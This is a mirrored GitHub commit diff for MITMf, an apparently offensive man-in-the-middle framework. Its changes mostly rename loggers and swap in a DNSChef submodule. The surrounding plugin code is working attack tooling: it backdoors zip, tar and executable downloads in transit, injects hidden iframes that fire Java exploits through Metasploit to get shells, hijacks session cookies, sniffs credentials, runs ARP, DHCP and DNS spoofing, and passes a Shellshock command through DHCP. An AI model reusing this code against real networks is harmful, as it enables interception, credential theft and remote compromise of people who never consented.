github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-08-20 13:33:30 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

- Logging is now seperate for each module

Browse source 
- added DNSChef submodule
- Code style improvements
- modified config file name , and options
- Changed requirements and README
This commit is contained in:
byt3bl33d3r 2015-04-11 00:38:48 +02:00
commit d4c6b7d5b6
28 changed files with 317 additions and 242 deletions
Download patch file Download diff file Expand all files Collapse all files

16
plugins/AppCachePoison.py
View file

@ -30,6 +30,8 @@ from plugins.plugin import Plugin
from datetime import date
from core.sslstrip.URLMonitor import URLMonitor
mitmf_logger = logging.getLogger('mitmf')
class AppCachePlugin(Plugin):
name = "App Cache Poison"
optname = "appoison"
@ -61,22 +63,22 @@ class AppCachePlugin(Plugin):
if "enable_only_in_useragents" in self.config:
regexp = self.config["enable_only_in_useragents"]
if regexp and not re.search(regexp,req_headers["user-agent"]):
logging.info("%s Tampering disabled in this useragent (%s)" % (ip, req_headers["user-agent"]))
mitmf_logger.info("%s Tampering disabled in this useragent (%s)" % (ip, req_headers["user-agent"]))
return {'request': request, 'data': data}
urls = self.urlMonitor.getRedirectionSet(url)
logging.debug("%s [AppCachePoison] Got redirection set: %s" % (ip, urls))
mitmf_logger.debug("%s [AppCachePoison] Got redirection set: %s" % (ip, urls))
(name,s,element,url) = self.getSectionForUrls(urls)
if s is False:
data = self.tryMassPoison(url, data, headers, req_headers, ip)
return {'request': request, 'data': data}
logging.info("%s Found URL %s in section %s" % (ip, url, name))
mitmf_logger.info("%s Found URL %s in section %s" % (ip, url, name))
p = self.getTemplatePrefix(s)
if element == 'tamper':
logging.info("%s Poisoning tamper URL with template %s" % (ip, p))
mitmf_logger.info("%s Poisoning tamper URL with template %s" % (ip, p))
if os.path.exists(p + '.replace'): # replace whole content
f = open(p + '.replace','r')
data = self.decorate(f.read(), s)
@ -93,12 +95,12 @@ class AppCachePlugin(Plugin):
data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(s)+"\"", data)
elif element == "manifest":
logging.info("%s Poisoning manifest URL" % ip)
mitmf_logger.info("%s Poisoning manifest URL" % ip)
data = self.getSpoofedManifest(url, s)
headers.setRawHeaders("Content-Type", ["text/cache-manifest"])
elif element == "raw": # raw resource to modify, it does not have to be html
logging.info("%s Poisoning raw URL" % ip)
mitmf_logger.info("%s Poisoning raw URL" % ip)
if os.path.exists(p + '.replace'): # replace whole content
f = open(p + '.replace','r')
data = self.decorate(f.read(), s)
@ -131,7 +133,7 @@ class AppCachePlugin(Plugin):
if not re.search(self.config['mass_poison_url_match'], url): #different url
return data
logging.debug("Adding AppCache mass poison for URL %s, id %s" % (url, browser_id))
mitmf_logger.debug("Adding AppCache mass poison for URL %s, id %s" % (url, browser_id))
appendix = self.getMassPoisonHtml()
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
self.mass_poisoned_browsers.append(browser_id) # mark to avoid mass spoofing for this ip

16
plugins/BeefAutorun.py
View file

@ -31,6 +31,8 @@ from time import sleep
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
requests_log.setLevel(logging.WARNING)
mitmf_logger = logging.getLogger('mitmf')
class BeefAutorun(Inject, Plugin):
name = "BeEFAutorun"
optname = "beefauto"
@ -83,7 +85,7 @@ class BeefAutorun(Inject, Plugin):
if session not in already_hooked:
info = beef.hook_info(session)
logging.info("%s >> joined the horde! [id:%s, type:%s-%s, os:%s]" % (info['ip'], info['id'], info['name'], info['version'], info['os']))
mitmf_logger.info("%s >> joined the horde! [id:%s, type:%s-%s, os:%s]" % (info['ip'], info['id'], info['name'], info['version'], info['os']))
already_hooked.append(session)
self.black_ips.append(str(info['ip']))
@ -106,17 +108,17 @@ class BeefAutorun(Inject, Plugin):
hook_os = session_info['os']
if len(self.All_modules) > 0:
logging.info("%s >> sending generic modules" % session_ip)
mitmf_logger.info("%s >> sending generic modules" % session_ip)
for module, options in self.All_modules.iteritems():
mod_id = beef.module_id(module)
resp = beef.module_run(session, mod_id, json.loads(options))
if resp["success"] == 'true':
logging.info('%s >> sent module %s' % (session_ip, mod_id))
mitmf_logger.info('%s >> sent module %s' % (session_ip, mod_id))
else:
logging.info('%s >> ERROR sending module %s' % (session_ip, mod_id))
mitmf_logger.info('%s >> ERROR sending module %s' % (session_ip, mod_id))
sleep(0.5)
logging.info("%s >> sending targeted modules" % session_ip)
mitmf_logger.info("%s >> sending targeted modules" % session_ip)
for os in self.Targeted_modules:
if (os in hook_os) or (os == hook_os):
browsers = self.Targeted_modules[os]
@ -129,7 +131,7 @@ class BeefAutorun(Inject, Plugin):
mod_id = beef.module_id(module)
resp = beef.module_run(session, mod_id, json.loads(options))
if resp["success"] == 'true':
logging.info('%s >> sent module %s' % (session_ip, mod_id))
mitmf_logger.info('%s >> sent module %s' % (session_ip, mod_id))
else:
logging.info('%s >> ERROR sending module %s' % (session_ip, mod_id))
mitmf_logger.info('%s >> ERROR sending module %s' % (session_ip, mod_id))
sleep(0.5)

4
plugins/BrowserProfiler.py
View file

@ -23,6 +23,8 @@ from plugins.Inject import Inject
from pprint import pformat
import logging
mitmf_logger = logging.getLogger('mitmf')
class BrowserProfiler(Inject, Plugin):
name = "Browser Profiler"
optname = "browserprofiler"
@ -53,7 +55,7 @@ class BrowserProfiler(Inject, Plugin):
if self.dic_output['plugin_list'] > 0:
self.dic_output['plugin_list'] = self.dic_output['plugin_list'].split(',')
pretty_output = pformat(self.dic_output)
logging.info("%s >> Browser Profiler data:\n%s" % (request.client.getClientIP(), pretty_output))
mitmf_logger.info("%s >> Browser Profiler data:\n%s" % (request.client.getClientIP(), pretty_output))
def get_payload(self):
payload = """<script type="text/javascript">

109
plugins/FilePwn.py
View file

@ -18,43 +18,40 @@
# USA
#
"""
BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
Copyright (c) 2013-2014, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
Tested on Kali-Linux.
"""
# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
#
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
#
# Copyright (c) 2013-2014, Joshua Pitts
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Tested on Kali-Linux.
import sys
import os
@ -74,6 +71,8 @@ from plugins.plugin import Plugin
from tempfile import mkstemp
from configobj import ConfigObj
mitmf_logger = logging.getLogger('mitmf')
class FilePwn(Plugin):
name = "FilePwn"
optname = "filepwn"
@ -303,7 +302,7 @@ class FilePwn(Plugin):
if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
print "[!] TarFile over allowed size"
logging.info("TarFIle maxSize met %s", len(aTarFileBytes))
mitmf_logger.info("TarFIle maxSize met %s", len(aTarFileBytes))
self.patched.put(aTarFileBytes)
return
@ -375,7 +374,7 @@ class FilePwn(Plugin):
if keywordCheck is True:
print "[!] Tar blacklist enforced!"
logging.info('Tar blacklist enforced on %s', info.name)
mitmf_logger.info('Tar blacklist enforced on %s', info.name)
continue
# Try to patch
@ -396,16 +395,16 @@ class FilePwn(Plugin):
info.size = os.stat(file2).st_size
with open(file2, 'rb') as f:
newTarFile.addfile(info, f)
logging.info("%s in tar patched, adding to tarfile", info.name)
mitmf_logger.info("%s in tar patched, adding to tarfile", info.name)
os.remove(file2)
wasPatched = True
else:
print "[!] Patching failed"
with open(tmp.name, 'rb') as f:
newTarFile.addfile(info, f)
logging.info("%s patching failed. Keeping original file in tar.", info.name)
mitmf_logger.info("%s patching failed. Keeping original file in tar.", info.name)
if patchCount == int(self.userConfig['TAR']['patchCount']):
logging.info("Met Tar config patchCount limit.")
mitmf_logger.info("Met Tar config patchCount limit.")
# finalize the writing of the tar file first
newTarFile.close()
@ -431,7 +430,7 @@ class FilePwn(Plugin):
if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
print "[!] ZipFile over allowed size"
logging.info("ZipFIle maxSize met %s", len(aZipFile))
mitmf_logger.info("ZipFIle maxSize met %s", len(aZipFile))
self.patched.put(aZipFile)
return
@ -452,7 +451,7 @@ class FilePwn(Plugin):
except RuntimeError as e:
if 'encrypted' in str(e):
logging.info('Encrypted zipfile found. Not patching.')
mitmf_logger.info('Encrypted zipfile found. Not patching.')
return aZipFile
print "[*] ZipFile contents and info:"
@ -488,7 +487,7 @@ class FilePwn(Plugin):
if keywordCheck is True:
print "[!] Zip blacklist enforced!"
logging.info('Zip blacklist enforced on %s', info.filename)
mitmf_logger.info('Zip blacklist enforced on %s', info.filename)
continue
patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)
@ -498,17 +497,17 @@ class FilePwn(Plugin):
file2 = "backdoored/" + os.path.basename(info.filename)
print "[*] Patching complete, adding to zip file."
shutil.copyfile(file2, tmpDir + '/' + info.filename)
logging.info("%s in zip patched, adding to zipfile", info.filename)
mitmf_logger.info("%s in zip patched, adding to zipfile", info.filename)
os.remove(file2)
wasPatched = True
else:
print "[!] Patching failed"
logging.info("%s patching failed. Keeping original file in zip.", info.filename)
mitmf_logger.info("%s patching failed. Keeping original file in zip.", info.filename)
print '-' * 10
if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting.
logging.info("Met Zip config patchCount limit.")
mitmf_logger.info("Met Zip config patchCount limit.")
break
zippyfile.close()
@ -547,7 +546,7 @@ class FilePwn(Plugin):
if content_header in self.zipMimeTypes:
if self.bytes_have_format(data, 'zip'):
logging.info("%s Detected supported zip file type!" % client_ip)
mitmf_logger.info("%s Detected supported zip file type!" % client_ip)
process = multiprocessing.Process(name='zip', target=self.zip, args=(data,))
process.daemon = True
@ -556,13 +555,13 @@ class FilePwn(Plugin):
bd_zip = self.patched.get()
if bd_zip:
logging.info("%s Patching complete, forwarding to client" % client_ip)
mitmf_logger.info("%s Patching complete, forwarding to client" % client_ip)
return {'request': request, 'data': bd_zip}
else:
for tartype in ['gz','bz','tar']:
if self.bytes_have_format(data, tartype):
logging.info("%s Detected supported tar file type!" % client_ip)
mitmf_logger.info("%s Detected supported tar file type!" % client_ip)
process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,))
process.daemon = True
@ -571,14 +570,14 @@ class FilePwn(Plugin):
bd_tar = self.patched.get()
if bd_tar:
logging.info("%s Patching complete, forwarding to client" % client_ip)
mitmf_logger.info("%s Patching complete, forwarding to client" % client_ip)
return {'request': request, 'data': bd_tar}
elif content_header in self.binaryMimeTypes:
for bintype in ['pe','elf','fatfile','machox64','machox86']:
if self.bytes_have_format(data, bintype):
logging.info("%s Detected supported binary type!" % client_ip)
mitmf_logger.info("%s Detected supported binary type!" % client_ip)
fd, tmpFile = mkstemp()
with open(tmpFile, 'w') as f:
f.write(data)
@ -592,9 +591,9 @@ class FilePwn(Plugin):
if patchb:
bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
os.remove('./backdoored/' + os.path.basename(tmpFile))
logging.info("%s Patching complete, forwarding to client" % client_ip)
mitmf_logger.info("%s Patching complete, forwarding to client" % client_ip)
return {'request': request, 'data': bd_binary}
else:
logging.debug("%s File is not of supported Content-Type: %s" % (client_ip, content_header))
mitmf_logger.debug("%s File is not of supported Content-Type: %s" % (client_ip, content_header))
return {'request': request, 'data': data}

4
plugins/Inject.py
View file

@ -28,6 +28,8 @@ import argparse
from plugins.plugin import Plugin
from plugins.CacheKill import CacheKill
mitmf_logger = logging.getLogger('mitmf')
class Inject(CacheKill, Plugin):
name = "Inject"
optname = "inject"
@ -87,7 +89,7 @@ class Inject(CacheKill, Plugin):
self.ctable[ip] = time.time()
self.dtable[ip+hn] = True
self.count += 1
logging.info("%s [%s] Injected malicious html" % (ip, hn))
mitmf_logger.info("%s [%s] Injected malicious html" % (ip, hn))
return {'request': request, 'data': data}
else:
return

33
plugins/JavaPwn.py
View file

@ -35,6 +35,7 @@ from scapy.all import get_if_addr
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
requests_log.setLevel(logging.WARNING)
mitmf_logger = logging.getLogger('mitmf')
class JavaPwn(BrowserProfiler, Plugin):
name = "JavaPwn"
@ -118,10 +119,10 @@ class JavaPwn(BrowserProfiler, Plugin):
def injectWait(self, msfinstance, url, client_ip): #here we inject an iframe to trigger the exploit and check for resulting sessions
#inject iframe
logging.info("%s >> now injecting iframe to trigger exploit" % client_ip)
mitmf_logger.info("%s >> now injecting iframe to trigger exploit" % client_ip)
self.html_payload = "<iframe src='http://%s:%s%s' height=0%% width=0%%></iframe>" % (self.msfip, self.msfport, url) #temporarily changes the code that the Browserprofiler plugin injects
logging.info('%s >> waiting for ze shellz, Please wait...' % client_ip)
mitmf_logger.info('%s >> waiting for ze shellz, Please wait...' % client_ip)
exit = False
i = 1
@ -132,7 +133,7 @@ class JavaPwn(BrowserProfiler, Plugin):
if len(shell) > 0:
for k, v in shell.iteritems():
if client_ip in shell[k]['tunnel_peer']: #make sure the shell actually came from the ip that we targeted
logging.info("%s >> Got shell!" % client_ip)
mitmf_logger.info("%s >> Got shell!" % client_ip)
self.sploited_ips.append(client_ip) #target successfuly exploited :)
self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped
exit = True
@ -141,13 +142,13 @@ class JavaPwn(BrowserProfiler, Plugin):
i += 1
if exit is False: #We didn't get a shell :(
logging.info("%s >> session not established after 30 seconds" % client_ip)
mitmf_logger.info("%s >> session not established after 30 seconds" % client_ip)
self.html_payload = self.get_payload() # restart the BrowserProfiler plugin
def send_command(self, cmd, msf, vic_ip):
try:
logging.info("%s >> sending commands to metasploit" % vic_ip)
mitmf_logger.info("%s >> sending commands to metasploit" % vic_ip)
#Create a virtual console
console_id = msf.call('console.create')['id']
@ -155,9 +156,9 @@ class JavaPwn(BrowserProfiler, Plugin):
#write the cmd to the newly created console
msf.call('console.write', [console_id, cmd])
logging.info("%s >> commands sent succesfully" % vic_ip)
mitmf_logger.info("%s >> commands sent succesfully" % vic_ip)
except Exception, e:
logging.info('%s >> Error accured while interacting with metasploit: %s:%s' % (vic_ip, Exception, e))
mitmf_logger.info('%s >> Error accured while interacting with metasploit: %s:%s' % (vic_ip, Exception, e))
def pwn(self, msf):
while True:
@ -169,19 +170,19 @@ class JavaPwn(BrowserProfiler, Plugin):
vic_ip = brwprofile['ip']
logging.info("%s >> client has java version %s installed! Proceeding..." % (vic_ip, brwprofile['java_version']))
logging.info("%s >> Choosing exploit based on version string" % vic_ip)
mitmf_logger.info("%s >> client has java version %s installed! Proceeding..." % (vic_ip, brwprofile['java_version']))
mitmf_logger.info("%s >> Choosing exploit based on version string" % vic_ip)
exploits = self.get_exploit(brwprofile['java_version']) # get correct exploit strings defined in javapwn.cfg
if exploits:
if len(exploits) > 1:
logging.info("%s >> client is vulnerable to %s exploits!" % (vic_ip, len(exploits)))
mitmf_logger.info("%s >> client is vulnerable to %s exploits!" % (vic_ip, len(exploits)))
exploit = random.choice(exploits)
logging.info("%s >> choosing %s" %(vic_ip, exploit))
mitmf_logger.info("%s >> choosing %s" %(vic_ip, exploit))
else:
logging.info("%s >> client is vulnerable to %s!" % (vic_ip, exploits[0]))
mitmf_logger.info("%s >> client is vulnerable to %s!" % (vic_ip, exploits[0]))
exploit = exploits[0]
#here we check to see if we already set up the exploit to avoid creating new jobs for no reason
@ -190,7 +191,7 @@ class JavaPwn(BrowserProfiler, Plugin):
for k, v in jobs.iteritems():
info = msf.call('job.info', [k])
if exploit in info['name']:
logging.info('%s >> %s already started' % (vic_ip, exploit))
mitmf_logger.info('%s >> %s already started' % (vic_ip, exploit))
url = info['uripath'] #get the url assigned to the exploit
self.injectWait(msf, url, vic_ip)
@ -207,15 +208,15 @@ class JavaPwn(BrowserProfiler, Plugin):
cmd += "set LPORT %s\n" % rand_port
cmd += "exploit -j\n"
logging.debug("command string:\n%s" % cmd)
mitmf_logger.debug("command string:\n%s" % cmd)
self.send_command(cmd, msf, vic_ip)
self.injectWait(msf, rand_url, vic_ip)
else:
#this might be removed in the future since newer versions of Java break the signed applet attack (unless you have a valid cert)
logging.info("%s >> client is not vulnerable to any java exploit" % vic_ip)
logging.info("%s >> falling back to the signed applet attack" % vic_ip)
mitmf_logger.info("%s >> client is not vulnerable to any java exploit" % vic_ip)
mitmf_logger.info("%s >> falling back to the signed applet attack" % vic_ip)
rand_url = self.rand_url()
rand_port = random.randint(1000, 65535)

5
plugins/Replace.py
View file

@ -29,6 +29,7 @@ import re
from plugins.plugin import Plugin
from plugins.CacheKill import CacheKill
mitmf_logger = logging.getLogger('mitmf')
class Replace(CacheKill, Plugin):
name = "Replace"
@ -70,14 +71,14 @@ class Replace(CacheKill, Plugin):
if self.search_str is not None and self.search_str != "":
data = data.replace(self.search_str, self.replace_str)
logging.info("%s [%s] Replaced '%s' with '%s'" % (request.client.getClientIP(), request.headers['host'], self.search_str, self.replace_str))
mitmf_logger.info("%s [%s] Replaced '%s' with '%s'" % (request.client.getClientIP(), request.headers['host'], self.search_str, self.replace_str))
# Did the user provide us with a regex file?
for regex in self.regexes:
try:
data = re.sub(regex[0], regex[1], data)
logging.info("%s [%s] Occurances matching '%s' replaced with '%s'" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))
mitmf_logger.info("%s [%s] Occurances matching '%s' replaced with '%s'" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))
except Exception:
logging.error("%s [%s] Your provided regex (%s) or replace value (%s) is empty or invalid. Please debug your provided regex(es)" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))

17
plugins/SSLstrip+.py
View file

@ -25,7 +25,6 @@ import logging
from plugins.plugin import Plugin
from core.utils import SystemConfig
from core.sslstrip.URLMonitor import URLMonitor
from core.wrappers.protocols import _DNS
class HSTSbypass(Plugin):
name = 'SSLstrip+'
@ -44,19 +43,13 @@ class HSTSbypass(Plugin):
except Exception, e:
sys.exit("[-] Error parsing config for SSLstrip+: " + str(e))
if not options.manualiptables:
SystemConfig.iptables.DNS(1)
self.dns = _DNS.getInstance()
self.dns.enableHSTS(config)
self.output.append("SSLstrip+ by Leonardo Nve running")
URLMonitor.getInstance().setHstsBypass(config)
def finish(self):
if _DNS.checkInstance() is True:
_DNS.getInstance().stop()
#def finish(self):
# if _DNS.checkInstance() is True:
# _DNS.getInstance().stop()
if not self.manualiptables:
SystemConfig.iptables.Flush()
# if not self.manualiptables:
# SystemConfig.iptables.Flush()

14
plugins/SessionHijacker.py
View file

@ -32,6 +32,8 @@ import sqlite3
import json
import socket
mitmf_logger = logging.getLogger('mitmf')
class SessionHijacker(Plugin):
name = "Session Hijacker"
optname = "hijack"
@ -84,7 +86,7 @@ class SessionHijacker(Plugin):
cvalue = str(cookie)[eq+1:].strip()
self.firefoxdb(headers['host'], cname, cvalue, url, client_ip)
logging.info("%s << Inserted cookie into firefox db" % client_ip)
mitmf_logger.info("%s << Inserted cookie into firefox db" % client_ip)
if self.mallory:
if len(self.sessions) > 0:
@ -93,12 +95,12 @@ class SessionHijacker(Plugin):
temp.append(session[0])
if headers['host'] not in temp:
self.sessions.append((headers['host'], headers['cookie']))
logging.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie']))
logging.info("%s Sent cookie to browser extension" % client_ip)
mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie']))
mitmf_logger.info("%s Sent cookie to browser extension" % client_ip)
else:
self.sessions.append((headers['host'], headers['cookie']))
logging.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie']))
logging.info("%s Sent cookie to browser extension" % client_ip)
mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie']))
mitmf_logger.info("%s Sent cookie to browser extension" % client_ip)
#def handleHeader(self, request, key, value): # Server => Client
# if 'set-cookie' in request.client.headers:
@ -108,7 +110,7 @@ class SessionHijacker(Plugin):
# if self.urlMonitor.isClientLogging() is True:
# self.urlMonitor.writeClientLog(request.client, request.client.headers, message)
# else:
# logging.info(message)
# mitmf_logger.info(message)
def mallory_server(self):
host = ''

8
plugins/Sniffer.py
View file

@ -35,6 +35,8 @@ import threading
import re
import os
mitmf_logger = logging.getLogger('mitmf')
class Sniffer(Plugin):
name = "Sniffer"
optname = "sniffer"
@ -103,7 +105,7 @@ class Sniffer(Plugin):
if param.split('=')[0] == search_param:
query = str(param.split('=')[1])
if query:
logging.info(request.clientInfo + "is querying %s for: %s" % (request.headers['host'], query))
mitmf_logger.info(request.clientInfo + "is querying %s for: %s" % (request.headers['host'], query))
except Exception, e:
error = str(e)
logging.warning(request.clientInfo + "Error parsing search query %s" % error)
@ -809,7 +811,7 @@ class NetCreds:
if dst_ip_port != None:
print_str = '%s --> %s %s' % (src_ip_port, dst_ip_port,msg)
# All credentials will have dst_ip_port, URLs will not
logging.info(print_str)
mitmf_logger.info(print_str)
else:
print_str = '%s %s' % (src_ip_port.split(':')[0], msg)
logging.info(print_str)
mitmf_logger.info(print_str)

25
plugins/Spoof.py
View file

@ -23,8 +23,9 @@ import sys
from core.utils import SystemConfig
from core.sslstrip.DnsCache import DnsCache
from core.wrappers.protocols import _ARP, _DHCP, _ICMP, _DNS
from core.wrappers.protocols import _ARP, _DHCP, _ICMP
from plugins.plugin import Plugin
from libs.dnschef.dnschef import start_dnschef
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import *
@ -32,7 +33,7 @@ from scapy.all import *
class Spoof(Plugin):
name = "Spoof"
optname = "spoof"
desc = "Redirect/Modify traffic using ICMP, ARP or DHCP"
desc = "Redirect/Modify traffic using ICMP, ARP, DHCP or DNS"
version = "0.6"
has_opts = True
req_root = True
@ -85,22 +86,17 @@ class Spoof(Plugin):
dhcp.shellshock = options.shellshock
dhcp.debug = debug
self.protocolInstances.append(dhcp)
else:
sys.exit("[-] Spoof plugin requires --arp, --icmp or --dhcp")
if options.dns:
if not options.manualiptables:
SystemConfig.iptables.DNS(0)
SystemConfig.iptables.DNS(options.ip_address, self.dnscfg['port'])
dnscache = DnsCache.getInstance()
for domain, ip in self.dnscfg.iteritems():
dnscache.cacheResolution(domain, ip)
start_dnschef(options, self.dnscfg)
self.output.append("DNSChef v0.3 online")
self.dns = _DNS.getInstance()
self.dns.enableDNS(self.dnscfg)
if not options.arp and not options.icmp and not options.dhcp and not options.dns:
sys.exit("[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns")
SystemConfig.setIpForwarding(1)
@ -115,7 +111,7 @@ class Spoof(Plugin):
group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing')
group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects')
group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers')
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Modify intercepted DNS queries')
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Proxy/Modify DNS queries')
options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
options.add_argument('--target', dest='target', default=None, help='Specify a host to poison [default: subnet]')
@ -126,9 +122,6 @@ class Spoof(Plugin):
for protocol in self.protocolInstances:
protocol.stop()
if _DNS.checkInstance() is True:
_DNS.getInstance().stop()
if not self.manualiptables:
SystemConfig.iptables.Flush()

5
plugins/Upsidedownternet.py
View file

@ -23,6 +23,7 @@ from cStringIO import StringIO
from plugins.plugin import Plugin
from PIL import Image
mitmf_logger = logging.getLogger('mitmf')
class Upsidedownternet(Plugin):
name = "Upsidedownternet"
@ -65,7 +66,7 @@ class Upsidedownternet(Plugin):
im.save(output, format=image_type)
data = output.getvalue()
output.close()
logging.info("%s Flipped image" % request.client.getClientIP())
mitmf_logger.info("%s Flipped image" % request.client.getClientIP())
except Exception as e:
logging.info("%s Error: %s" % (request.client.getClientIP(), e))
mitmf_logger.info("%s Error: %s" % (request.client.getClientIP(), e))
return {'request': request, 'data': data}